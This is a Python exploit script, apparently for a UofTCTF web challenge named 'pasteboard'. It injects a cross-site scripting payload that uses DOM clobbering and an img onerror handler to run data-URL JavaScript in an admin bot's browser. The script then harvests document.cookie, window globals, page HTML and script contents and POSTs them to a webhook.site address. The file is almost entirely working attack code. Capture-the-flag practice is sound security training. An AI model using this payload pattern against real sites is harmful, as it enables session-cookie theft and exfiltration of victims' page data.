#!/usr/bin/env python3
"""
Deep inspection - check EVERYTHING in the page
"""
import requests
from urllib.parse import urljoin, quote

CHALLENGE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Deep inspection payload
code = f"""(async () => {{
    const data = {{}};
    
    // 1. ALL window properties (not just ones with 'flag')
    data.allWindowProps = Object.getOwnPropertyNames(window).slice(0, 100);
    
    // 2. Check for any global variables set by bot
    data.globalVars = {{}};
    for (let key in window) {{
        if (window.hasOwnProperty(key) && typeof window[key] === 'string') {{
            if (window[key].includes('uoftctf') || window[key].includes('flag') || window[key].includes('FLAG')) {{
                data.globalVars[key] = window[key];
            }}
        }}
    }}
    
    // 3. All meta tags
    data.metaTags = Array.from(document.querySelectorAll('meta')).map(m => ({{
        name: m.name,
        property: m.getAttribute('property'),
        content: m.content,
        httpEquiv: m.httpEquiv
    }}));
    
    // 4. All data-* attributes
    data.dataAttrs = [];
    document.querySelectorAll('[data-flag], [data-secret]').forEach(el => {{
        for (let attr of el.attributes) {{
            if (attr.name.startsWith('data-')) {{
                data.dataAttrs.push({{el: el.tagName, attr: attr.name, val: attr.value}});
            }}
        }}
    }});
    
    // 5. All comments in HTML
    data.comments = [];
    const walker = document.createTreeWalker(document, NodeFilter.SHOW_COMMENT);
    let node;
    while (node = walker.nextNode()) {{
        data.comments.push(node.textContent);
    }}
    
    // 6. All script tags
    data.scripts = Array.from(document.querySelectorAll('script')).map(s => ({{
        src: s.src,
        id: s.id,
        content: s.textContent.substring(0, 100)
    }}));
    
    // 7. Check navigator object
    data.navigator = {{
        userAgent: navigator.userAgent,
        platform: navigator.platform,
        vendor: navigator.vendor
    }};
    
    // 8. Full document HTML (first 2000 chars)
    data.fullHTML = document.documentElement.outerHTML.substring(0, 2000);
    
    // 9. Check for any cookies (all of them)
    data.allCookies = document.cookie;
    
    // 10. Performance entries (might have flag in URL)
    data.perfEntries = performance.getEntries().map(e => e.name);
    
    await fetch('{WEBHOOK}', {{
        method: 'POST',
        headers: {{'Content-Type': 'application/json'}},
        body: JSON.stringify(data, null, 2)
    }});
}})();""".replace('\n', ' ')

payload = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{quote(code)}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'

print("🔍 Sending deep inspection payload...")

response = requests.post(
    urljoin(CHALLENGE_URL, "/note/new"),
    data={"title": "Deep Inspection", "body": payload},
    allow_redirects=False
)

if response.status_code == 302:
    note_path = response.headers.get('Location')
    print(f"✅ Paste created: {urljoin(CHALLENGE_URL, note_path)}")

    report_response = requests.post(
        urljoin(CHALLENGE_URL, "/report"),
        data={"url": note_path}
    )

    if report_response.status_code == 202:
        print(f"✅ Queued!")
        print(f"\n📊 This will dump:")
        print(f"   - ALL window properties")
        print(f"   - All global variables")
        print(f"   - All meta tags")
        print(f"   - HTML comments")
        print(f"   - All script tags")
        print(f"   - Full HTML (first 2000 chars)")
        print(f"   - Performance entries")
        print(f"\n🌐 Check webhook: {WEBHOOK}")